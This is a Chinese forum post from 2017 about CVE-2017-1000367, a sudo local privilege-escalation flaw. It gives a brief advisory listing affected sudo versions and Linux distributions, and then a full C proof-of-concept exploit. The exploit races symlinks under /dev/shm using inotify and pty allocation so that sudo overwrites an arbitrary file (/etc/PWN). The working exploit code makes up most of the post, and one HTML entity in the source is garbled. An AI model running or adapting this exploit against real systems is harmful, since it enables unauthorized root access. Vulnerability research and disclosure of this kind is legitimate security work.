|
2017年5月30日,国外安全研究人员发现Linux环节下,可以通过sudo实现本地提权漏洞,漏洞编号为CVE-2017-1000367,该漏洞几乎影响了所有Linux系统。
具体详情如下:
漏洞编号:
CVE-2017-1000367
漏洞名称:
Sudo本地提权漏洞
官方评级:
高危
漏洞描述:
当确定tty时,Sudo没有正确解析/ proc / [pid] / stat的内容,本地攻击者可能会使用此方法来覆盖文件系统上的任何文件,从而绕过预期权限或获取root shell。
漏洞利用条件和方式:
本地利用
漏洞影响范围:
Sudo 1.8.6p7 到 1.8.20
Red Hat Enterprise Linux 6 (sudo) Red Hat Enterprise Linux 7 (sudo) Red Hat Enterprise Linux Server (v. 5 ELS) (sudo) Debian wheezy Debian jessie Debian stretch Debian sid Ubuntu 17.04 Ubuntu 16.10 Ubuntu 16.04 LTS Ubuntu 14.04 LTS SUSE Linux Enterprise Software Development Kit 12-SP2 SUSE Linux Enterprise Server for Raspberry Pi 12-SP2 SUSE Linux Enterprise Server 12-SP2 SUSE Linux Enterprise Desktop 12-SP2 OpenSuse
- #include <errno.h>
- #include <linux/sched.h>
- #include <pty.h>
- #include <sched.h>
- #include <signal.h>
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- #include <sys/inotify.h>
- #include <sys/resource.h>
- #include <sys/stat.h>
- #include <sys/types.h>
- #include <unistd.h>
- #define EVENT_SIZE ( sizeof (struct inotify_event) )
- #define EVENT_BUF_LEN ( 1024 * ( EVENT_SIZE + 16 ) )
- int main( )
- {
- int length, i = 0;
- int fd;
- int wd;
- char buffer[EVENT_BUF_LEN];
- int master, slave;
- char pts_path[256];
- struct sched_param params;
- params.sched_priority = 0;
- mkdir("/dev/shm/_tmp", 755);
- symlink(pts_path, "/dev/shm/_tmp/_tty");
- symlink("/usr/bin/sudo", "/dev/shm/_tmp/ 34873 ");
- fd = inotify_init();
- wd = inotify_add_watch( fd, "/dev/shm/_tmp", IN_OPEN | IN_CLOSE_NOWRITE );
- pid_t pid = fork();
- setpriority(PRIO_PROCESS, pid, 19);
- sched_setscheduler(pid, SCHED_IDLE, ¶ms);
-
- if(pid == 0) {
- execlp("/dev/shm/_tmp/ 34873 ", "sudo", "--\nHELLO\nWORLD\n", NULL);
- }else{
- length = read( fd, buffer, EVENT_BUF_LEN );
- while ( i < length ) {
- struct inotify_event *event = ( struct inotify_event * ) &buffer[ i ];
- if ( event->len ) {
- if ( event->mask & IN_OPEN ) {
- kill(pid, SIGSTOP);
- inotify_rm_watch( fd, wd );
- close( fd );
- while(strcmp(pts_path,"/dev/pts/57")){
- openpty(&master, &slave, &pts_path[0], NULL, NULL);
- };
- kill(pid, SIGCONT);
- }else if ( event->mask & IN_CLOSE_NOWRITE ) {
- kill(pid, SIGSTOP);
- inotify_rm_watch( fd, wd );
- close( fd );
- unlink("/dev/shm/_tmp/_tty");
- symlink("/etc/PWN", "/dev/shm/_tmp/_tty");
- kill(pid, SIGCONT);
- break;
- }
- }
- i += EVENT_SIZE + event->len;
- }
- }
- unlink("/dev/shm/_tmp/_tty");
- unlink("/dev/shm/_tmp/ 34873 ");
- rmdir("/dev/shm/_tmp");
- close(master);
- close(slave);
- }
|
|小黑屋|手机版|中国白客联盟-BUC
( 赣ICP备15007148号-6 ) 
窥视卡
雷达卡
发表于 2017-6-11 19:31:21
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡